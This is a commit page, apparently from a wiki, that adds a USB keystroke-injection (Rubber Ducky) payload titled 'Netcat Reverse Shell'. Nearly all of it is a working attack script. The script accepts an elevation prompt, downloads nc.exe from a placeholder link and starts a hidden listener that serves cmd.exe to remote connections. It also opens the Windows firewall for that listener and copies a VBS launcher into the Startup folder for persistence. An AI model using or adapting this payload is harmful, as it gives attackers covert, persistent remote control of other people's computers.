Created Payload Netcat Reverse Shell (markdown)
This commit is contained in:
parent
4d009a6f37
commit
8bb221a3db
|
@ -0,0 +1,82 @@
|
|||
### **Change the following details**:
|
||||
* **[NETCAT_DOWNLOAD_LINK]**: Your Netcat download link.
|
||||
* **[PORT]**: The port on the target machine you want netcat to listen on.
|
||||
* **Directory**: Use something other than %TEMP% if you want to.
|
||||
|
||||
## **CODE**:
|
||||
```
|
||||
REM Title: Netcat Reverse Shell
|
||||
REM Author: Kanishk Singh
|
||||
REM Version: 1
|
||||
REM Description:
|
||||
DELAY 200
|
||||
REM --> Minimize all windows
|
||||
WINDOWS d
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process cmd -Verb RunAs
|
||||
ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 500
|
||||
STRING cd %TEMP%
|
||||
ENTER
|
||||
|
||||
REM --> Kills already running Netcat instance (if any)
|
||||
STRING TASKKILL /im nc.exe /f
|
||||
ENTER
|
||||
REM --> Delete nc.exe file if it already exists
|
||||
STRING erase /Q nc.exe
|
||||
ENTER
|
||||
REM --> Delete Start batch file if it already exists
|
||||
STRING erase /Q Start.bat
|
||||
ENTER
|
||||
REM --> Delete Invisible.vbs in temp folder, if it already exists
|
||||
STRING erase /Q invisible.vbs
|
||||
ENTER
|
||||
REM --> Delete invisible.vbs file in Startup if it already exists
|
||||
STRING erase /Q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs"
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM --> Downloads NetCat
|
||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://[NETCAT_DOWNLOAD_LINK]/nc.exe','nc.exe')
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM --> Creates a batch file to start listening
|
||||
STRING copy con Start.bat
|
||||
ENTER
|
||||
STRING nc -lp [PORT] -vv -e cmd.exe -L
|
||||
ENTER
|
||||
CONTROL z
|
||||
ENTER
|
||||
|
||||
REM --> Starts batch file invisibly
|
||||
STRING copy con invisible.vbs
|
||||
ENTER
|
||||
STRING Set WshShell = CreateObject("WScript.Shell" )
|
||||
ENTER
|
||||
STRING WshShell.Run chr(34) & "%TEMP%\Start.bat" & Chr(34), 0
|
||||
ENTER
|
||||
STRING Set WshShell = Nothing
|
||||
ENTER
|
||||
CONTROL z
|
||||
ENTER
|
||||
REM --> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly
|
||||
STRING netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="%TEMP%\nc.exe" enable=yes
|
||||
ENTER
|
||||
STRING start invisible.vbs
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM --> Copies invisible.vbs to startup folder for persistence
|
||||
STRING copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
|
||||
ENTER
|
||||
REM --> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes
|
||||
STRING exit
|
||||
ENTER
|
||||
```
|
||||
|
||||
## **To-Do**:
|
||||
* Test whether the script executes at startup.
|
Loading…
Reference in New Issue